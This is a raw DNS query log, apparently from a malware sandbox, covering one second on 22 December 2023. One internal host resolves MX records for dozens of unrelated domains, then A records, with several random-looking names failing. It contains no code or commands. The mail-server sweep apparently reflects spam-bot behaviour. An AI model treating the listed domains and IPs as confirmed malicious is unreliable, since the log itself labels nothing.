Dec 22, 2023 21:14:49.149786949 CET	1.1.1.1	192.168.2.4	0x76ea	No error (0)	tgeddesgrant.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.149786949 CET	1.1.1.1	192.168.2.4	0x76ea	No error (0)	tgeddesgrant.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.149786949 CET	1.1.1.1	192.168.2.4	0x76ea	No error (0)	tgeddesgrant.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.149786949 CET	1.1.1.1	192.168.2.4	0x76ea	No error (0)	tgeddesgrant.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.149786949 CET	1.1.1.1	192.168.2.4	0x76ea	No error (0)	tgeddesgrant.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.151092052 CET	1.1.1.1	192.168.2.4	0xe52	Name error (3)	daystarbookscharity.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.153068066 CET	1.1.1.1	192.168.2.4	0x6fc2	No error (0)	afrimail.33mail.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.154211998 CET	1.1.1.1	192.168.2.4	0x38f1	No error (0)	easlab.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.157577038 CET	1.1.1.1	192.168.2.4	0xd8ff	Name error (3)	gpa.orgau	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.160130024 CET	1.1.1.1	192.168.2.4	0x8970	No error (0)	tvs-e.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.160871983 CET	1.1.1.1	192.168.2.4	0x81fb	No error (0)	adelaideclub.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.164700031 CET	1.1.1.1	192.168.2.4	0x2651	No error (0)	grassgraphics.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.164700031 CET	1.1.1.1	192.168.2.4	0x2651	No error (0)	grassgraphics.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.164784908 CET	1.1.1.1	192.168.2.4	0xdddd	No error (0)	cicfl.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.164784908 CET	1.1.1.1	192.168.2.4	0xdddd	No error (0)	cicfl.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.165229082 CET	1.1.1.1	192.168.2.4	0xbcea	No error (0)	demarillac.net			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.165229082 CET	1.1.1.1	192.168.2.4	0xbcea	No error (0)	demarillac.net			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.165229082 CET	1.1.1.1	192.168.2.4	0xbcea	No error (0)	demarillac.net			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.165229082 CET	1.1.1.1	192.168.2.4	0xbcea	No error (0)	demarillac.net			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.165229082 CET	1.1.1.1	192.168.2.4	0xbcea	No error (0)	demarillac.net			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.167188883 CET	1.1.1.1	192.168.2.4	0x7587	No error (0)	thenile.com.au			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.167188883 CET	1.1.1.1	192.168.2.4	0x7587	No error (0)	thenile.com.au			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.167188883 CET	1.1.1.1	192.168.2.4	0x7587	No error (0)	thenile.com.au			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.167188883 CET	1.1.1.1	192.168.2.4	0x7587	No error (0)	thenile.com.au			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.167188883 CET	1.1.1.1	192.168.2.4	0x7587	No error (0)	thenile.com.au			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.167768002 CET	1.1.1.1	192.168.2.4	0xc2ae	Name error (3)	pkmanagment.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.170968056 CET	1.1.1.1	192.168.2.4	0xf926	No error (0)	bldowney.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.170968056 CET	1.1.1.1	192.168.2.4	0xf926	No error (0)	bldowney.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.172570944 CET	1.1.1.1	192.168.2.4	0xd894	No error (0)	keywordranker.com	traff-1.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:49.172570944 CET	1.1.1.1	192.168.2.4	0xd894	No error (0)	traff-1.hugedomains.com	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:49.179586887 CET	1.1.1.1	192.168.2.4	0x83a7	No error (0)	caribbean360.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.179586887 CET	1.1.1.1	192.168.2.4	0x83a7	No error (0)	caribbean360.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.179586887 CET	1.1.1.1	192.168.2.4	0x83a7	No error (0)	caribbean360.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.179586887 CET	1.1.1.1	192.168.2.4	0x83a7	No error (0)	caribbean360.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.182574987 CET	1.1.1.1	192.168.2.4	0x23c8	No error (0)	adm-works.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.182615995 CET	1.1.1.1	192.168.2.4	0x55d8	No error (0)	oe.target.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.184185982 CET	1.1.1.1	192.168.2.4	0x5d54	No error (0)	sunbeltfinancial.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.184185982 CET	1.1.1.1	192.168.2.4	0x5d54	No error (0)	sunbeltfinancial.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.184185982 CET	1.1.1.1	192.168.2.4	0x5d54	No error (0)	sunbeltfinancial.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.184185982 CET	1.1.1.1	192.168.2.4	0x5d54	No error (0)	sunbeltfinancial.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.189960003 CET	1.1.1.1	192.168.2.4	0x9370	No error (0)	yuejichem.com	traff-1.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:49.189960003 CET	1.1.1.1	192.168.2.4	0x9370	No error (0)	traff-1.hugedomains.com	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:49.190093040 CET	1.1.1.1	192.168.2.4	0x904e	Name error (3)	ambquinn.plus.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.191179991 CET	1.1.1.1	192.168.2.4	0xec96	No error (0)	necalin.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.191179991 CET	1.1.1.1	192.168.2.4	0xec96	No error (0)	necalin.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.193245888 CET	1.1.1.1	192.168.2.4	0xff22	No error (0)	liberty25.org			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.193245888 CET	1.1.1.1	192.168.2.4	0xff22	No error (0)	liberty25.org			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.201077938 CET	1.1.1.1	192.168.2.4	0x744	Name error (3)	joserafael.com.ve	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.210244894 CET	1.1.1.1	192.168.2.4	0x9af1	No error (0)	williamcroy.plus.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.211690903 CET	1.1.1.1	192.168.2.4	0x6dcb	No error (0)	maroonshockey.org			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.211690903 CET	1.1.1.1	192.168.2.4	0x6dcb	No error (0)	maroonshockey.org			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.226433039 CET	1.1.1.1	192.168.2.4	0x27be	No error (0)	valentinegrowers.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.233068943 CET	1.1.1.1	192.168.2.4	0x5a17	No error (0)	flandria-loisirs.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.233068943 CET	1.1.1.1	192.168.2.4	0x5a17	No error (0)	flandria-loisirs.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.266908884 CET	1.1.1.1	192.168.2.4	0xcf08	No error (0)	mailbox.lpl.org			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.300306082 CET	1.1.1.1	192.168.2.4	0xcc8	Name error (3)	srlbonfon9.com.hk	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.322272062 CET	1.1.1.1	192.168.2.4	0xbcbc	Name error (3)	mobileuser.baihe.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.338701010 CET	1.1.1.1	192.168.2.4	0xf270	No error (0)	enricobassi.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.347620010 CET	1.1.1.1	192.168.2.4	0x28df	No error (0)	mcammond.net			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.347620010 CET	1.1.1.1	192.168.2.4	0x28df	No error (0)	mcammond.net			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.351356983 CET	1.1.1.1	192.168.2.4	0xb311	No error (0)	ispsolucoes.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.351356983 CET	1.1.1.1	192.168.2.4	0xb311	No error (0)	ispsolucoes.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.351356983 CET	1.1.1.1	192.168.2.4	0xb311	No error (0)	ispsolucoes.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.351356983 CET	1.1.1.1	192.168.2.4	0xb311	No error (0)	ispsolucoes.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.364428043 CET	1.1.1.1	192.168.2.4	0xb02a	No error (0)	covicol.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.371265888 CET	1.1.1.1	192.168.2.4	0xf15a	No error (0)	fuckyoufriday.com.au			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.371265888 CET	1.1.1.1	192.168.2.4	0xf15a	No error (0)	fuckyoufriday.com.au			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.432832956 CET	1.1.1.1	192.168.2.4	0x7287	No error (0)	esisalama.org			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.432832956 CET	1.1.1.1	192.168.2.4	0x7287	No error (0)	esisalama.org			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.432832956 CET	1.1.1.1	192.168.2.4	0x7287	No error (0)	esisalama.org			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.432832956 CET	1.1.1.1	192.168.2.4	0x7287	No error (0)	esisalama.org			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.432832956 CET	1.1.1.1	192.168.2.4	0x7287	No error (0)	esisalama.org			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.434501886 CET	1.1.1.1	192.168.2.4	0xf0a4	No error (0)	massnegocios.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.434501886 CET	1.1.1.1	192.168.2.4	0xf0a4	No error (0)	massnegocios.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.504523039 CET	1.1.1.1	192.168.2.4	0x6506	Name error (3)	excursionesmadryn.com.ar	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.509835958 CET	1.1.1.1	192.168.2.4	0x4941	No error (0)	geis.com.au			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.509835958 CET	1.1.1.1	192.168.2.4	0x4941	No error (0)	geis.com.au			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.509835958 CET	1.1.1.1	192.168.2.4	0x4941	No error (0)	geis.com.au			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.509835958 CET	1.1.1.1	192.168.2.4	0x4941	No error (0)	geis.com.au			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.509835958 CET	1.1.1.1	192.168.2.4	0x4941	No error (0)	geis.com.au			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.511976004 CET	1.1.1.1	192.168.2.4	0xa7f0	Name error (3)	rumbeandoelmundo.com.ar	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.521442890 CET	1.1.1.1	192.168.2.4	0x9520	No error (0)	oljud.net			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.535916090 CET	1.1.1.1	192.168.2.4	0xc3af	No error (0)	adelaideclub.com		64.68.191.221	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.561222076 CET	1.1.1.1	192.168.2.4	0xe13d	Name error (3)	rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.567223072 CET	1.1.1.1	192.168.2.4	0x433a	No error (0)	cicfl.com		209.124.80.122	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.576819897 CET	1.1.1.1	192.168.2.4	0xa49b	No error (0)	shapeab.com		209.182.195.165	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.585726976 CET	1.1.1.1	192.168.2.4	0xe56	No error (0)	racesystems.com.au			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.607692003 CET	1.1.1.1	192.168.2.4	0x229a	No error (0)	easlab.com		192.185.183.254	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.618885040 CET	1.1.1.1	192.168.2.4	0xe8ef	No error (0)	jiashi.com	info.fumi.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:49.671773911 CET	1.1.1.1	192.168.2.4	0xc84a	No error (0)	conquestaccounting.com.au			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.717880964 CET	1.1.1.1	192.168.2.4	0xbc17	No error (0)	pistik.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.721833944 CET	1.1.1.1	192.168.2.4	0xecdd	No error (0)	ireland-ventures.com		66.254.66.55	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.724520922 CET	1.1.1.1	192.168.2.4	0x73a8	No error (0)	buyhits.net		104.143.9.211	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.724520922 CET	1.1.1.1	192.168.2.4	0x73a8	No error (0)	buyhits.net		104.143.9.210	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.755469084 CET	1.1.1.1	192.168.2.4	0xaf9a	No error (0)	omuramba.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.798299074 CET	1.1.1.1	192.168.2.4	0xf9b0	No error (0)	dpikorea.org			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.798299074 CET	1.1.1.1	192.168.2.4	0xf9b0	No error (0)	dpikorea.org			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.852843046 CET	1.1.1.1	192.168.2.4	0x229a	No error (0)	easlab.com		192.185.183.254	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.852978945 CET	1.1.1.1	192.168.2.4	0x433a	No error (0)	cicfl.com		209.124.80.122	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.852999926 CET	1.1.1.1	192.168.2.4	0xa49b	No error (0)	shapeab.com		209.182.195.165	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.853351116 CET	1.1.1.1	192.168.2.4	0xe13d	Name error (3)	rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.853529930 CET	1.1.1.1	192.168.2.4	0x73a8	No error (0)	buyhits.net		104.143.9.211	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.853529930 CET	1.1.1.1	192.168.2.4	0x73a8	No error (0)	buyhits.net		104.143.9.210	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.853929043 CET	1.1.1.1	192.168.2.4	0xc3af	No error (0)	adelaideclub.com		64.68.191.221	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.856205940 CET	1.1.1.1	192.168.2.4	0x50be	Name error (3)	jesusanswwers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.859781981 CET	1.1.1.1	192.168.2.4	0x66c2	No error (0)	grassgraphics.com		173.201.182.85	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.860126019 CET	1.1.1.1	192.168.2.4	0x5718	No error (0)	flandria-loisirs.com		91.132.253.137	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.861740112 CET	1.1.1.1	192.168.2.4	0x19d8	No error (0)	ismaworld.com		68.178.145.3	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.863198042 CET	1.1.1.1	192.168.2.4	0xb83f	Name error (3)	mywitce.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.882261992 CET	1.1.1.1	192.168.2.4	0x1c76	No error (0)	aldine.org.com		34.206.39.153	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.882991076 CET	1.1.1.1	192.168.2.4	0x720f	Name error (3)	sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.883933067 CET	1.1.1.1	192.168.2.4	0x71ca	Name error (3)	dm.famm.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.884361029 CET	1.1.1.1	192.168.2.4	0x85a7	Name error (3)	e-manage.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.884377003 CET	1.1.1.1	192.168.2.4	0xf102	Name error (3)	9a07f8a339ec2a3e.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.888201952 CET	1.1.1.1	192.168.2.4	0xb1b9	Name error (3)	dresslermd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.889008999 CET	1.1.1.1	192.168.2.4	0x5e14	Name error (3)	nsorekek.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.889199972 CET	1.1.1.1	192.168.2.4	0xd446	No error (0)	derrickandbriggs.com		23.229.226.96	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.893806934 CET	1.1.1.1	192.168.2.4	0xfd28	No error (0)	pmcsystem.com		185.230.63.107	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.903412104 CET	1.1.1.1	192.168.2.4	0x5afc	Name error (3)	263host.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.906790972 CET	1.1.1.1	192.168.2.4	0xa30f	No error (0)	coupons2grab.com		205.178.189.129	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.909066916 CET	1.1.1.1	192.168.2.4	0x44f6	Name error (3)	freedhal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.909189939 CET	1.1.1.1	192.168.2.4	0x624c	Name error (3)	pkmanagment.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.910435915 CET	1.1.1.1	192.168.2.4	0x1467	Name error (3)	mercor.compl	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.911834955 CET	1.1.1.1	192.168.2.4	0x8185	Name error (3)	integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.912686110 CET	1.1.1.1	192.168.2.4	0x3139	Name error (3)	arbsdecq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.914926052 CET	1.1.1.1	192.168.2.4	0x3ce6	No error (0)	vixej.com	traff-4.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:49.914926052 CET	1.1.1.1	192.168.2.4	0x3ce6	No error (0)	traff-4.hugedomains.com	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:49.914926052 CET	1.1.1.1	192.168.2.4	0x3ce6	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		3.94.41.167	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.914926052 CET	1.1.1.1	192.168.2.4	0x3ce6	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		52.86.6.113	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.923955917 CET	1.1.1.1	192.168.2.4	0x96d7	No error (0)	thenile.com.au		104.24.82.4	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.923955917 CET	1.1.1.1	192.168.2.4	0x96d7	No error (0)	thenile.com.au		104.24.83.4	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.925326109 CET	1.1.1.1	192.168.2.4	0x453f	No error (0)	fotoestudiomiret.com		167.235.0.29	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.931427002 CET	1.1.1.1	192.168.2.4	0x15cc	Name error (3)	souriahost.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.933670044 CET	1.1.1.1	192.168.2.4	0x1adc	No error (0)	afrimail.33mail.com		44.194.75.85	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.935240030 CET	1.1.1.1	192.168.2.4	0x26ab	Name error (3)	djaskdas.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.935419083 CET	1.1.1.1	192.168.2.4	0x43e4	Name error (3)	hyiquu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.935622931 CET	1.1.1.1	192.168.2.4	0x4a09	Name error (3)	piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.936566114 CET	1.1.1.1	192.168.2.4	0x355f	Name error (3)	91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.938446999 CET	1.1.1.1	192.168.2.4	0x835e	Name error (3)	hermanassociatesnewyork.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.941332102 CET	1.1.1.1	192.168.2.4	0xfaeb	Name error (3)	sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.945843935 CET	1.1.1.1	192.168.2.4	0xaea0	Name error (3)	taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.945980072 CET	1.1.1.1	192.168.2.4	0x8807	Name error (3)	daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.946068048 CET	1.1.1.1	192.168.2.4	0x8c7a	Name error (3)	dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.946829081 CET	1.1.1.1	192.168.2.4	0xfa0a	No error (0)	tvs-e.com		13.126.65.12	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.947200060 CET	1.1.1.1	192.168.2.4	0xae15	No error (0)	bethanyhomesnc.com		167.172.236.129	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.947840929 CET	1.1.1.1	192.168.2.4	0x1ab8	Name error (3)	enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.963505030 CET	1.1.1.1	192.168.2.4	0x2e47	Name error (3)	hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.964407921 CET	1.1.1.1	192.168.2.4	0x1f2e	No error (0)	davescheirer.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.964407921 CET	1.1.1.1	192.168.2.4	0x1f2e	No error (0)	davescheirer.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.968080997 CET	1.1.1.1	192.168.2.4	0x814	No error (0)	kegerators.net		15.197.142.173	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.968080997 CET	1.1.1.1	192.168.2.4	0x814	No error (0)	kegerators.net		3.33.152.147	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.976643085 CET	1.1.1.1	192.168.2.4	0xc62	No error (0)	oe.target.com		136.147.129.27	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.977917910 CET	1.1.1.1	192.168.2.4	0x4ea1	No error (0)	videolifeperu.com		107.158.136.76	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.992656946 CET	1.1.1.1	192.168.2.4	0x2868	Name error (3)	ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.999948978 CET	1.1.1.1	192.168.2.4	0x2d99	No error (0)	ispsolucoes.com		34.136.28.237	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.000163078 CET	1.1.1.1	192.168.2.4	0x8287	No error (0)	liberty25.org		104.17.71.73	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.005240917 CET	1.1.1.1	192.168.2.4	0x7bba	No error (0)	bldowney.com		69.42.204.12	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.028239965 CET	1.1.1.1	192.168.2.4	0x67c4	Name error (3)	hodginssmithconsulting.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.031434059 CET	1.1.1.1	192.168.2.4	0x3ce6	No error (0)	vixej.com	traff-4.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:50.031434059 CET	1.1.1.1	192.168.2.4	0x3ce6	No error (0)	traff-4.hugedomains.com	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:50.031434059 CET	1.1.1.1	192.168.2.4	0x3ce6	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		52.86.6.113	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.031434059 CET	1.1.1.1	192.168.2.4	0x3ce6	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		3.94.41.167	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.031590939 CET	1.1.1.1	192.168.2.4	0x5e14	Name error (3)	nsorekek.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.031785965 CET	1.1.1.1	192.168.2.4	0x453f	No error (0)	fotoestudiomiret.com		167.235.0.29	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.031876087 CET	1.1.1.1	192.168.2.4	0xfd28	No error (0)	pmcsystem.com		185.230.63.107	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.032198906 CET	1.1.1.1	192.168.2.4	0x2d99	No error (0)	ispsolucoes.com		34.136.28.237	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.032243013 CET	1.1.1.1	192.168.2.4	0x1adc	No error (0)	afrimail.33mail.com		44.194.75.85	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.032253981 CET	1.1.1.1	192.168.2.4	0xb1b9	Name error (3)	dresslermd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.032294035 CET	1.1.1.1	192.168.2.4	0xc62	No error (0)	oe.target.com		136.147.129.27	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.032331944 CET	1.1.1.1	192.168.2.4	0xa30f	No error (0)	coupons2grab.com		205.178.189.129	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.032618999 CET	1.1.1.1	192.168.2.4	0x8807	Name error (3)	daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.032752991 CET	1.1.1.1	192.168.2.4	0x1ab8	Name error (3)	enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.033143044 CET	1.1.1.1	192.168.2.4	0x8c7a	Name error (3)	dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.033159018 CET	1.1.1.1	192.168.2.4	0x4ea1	No error (0)	videolifeperu.com		107.158.136.76	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.040555000 CET	1.1.1.1	192.168.2.4	0x7bba	No error (0)	bldowney.com		69.42.204.12	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.040733099 CET	1.1.1.1	192.168.2.4	0x96d7	No error (0)	thenile.com.au		104.24.82.4	A (IP address)	IN (0x0001)	false
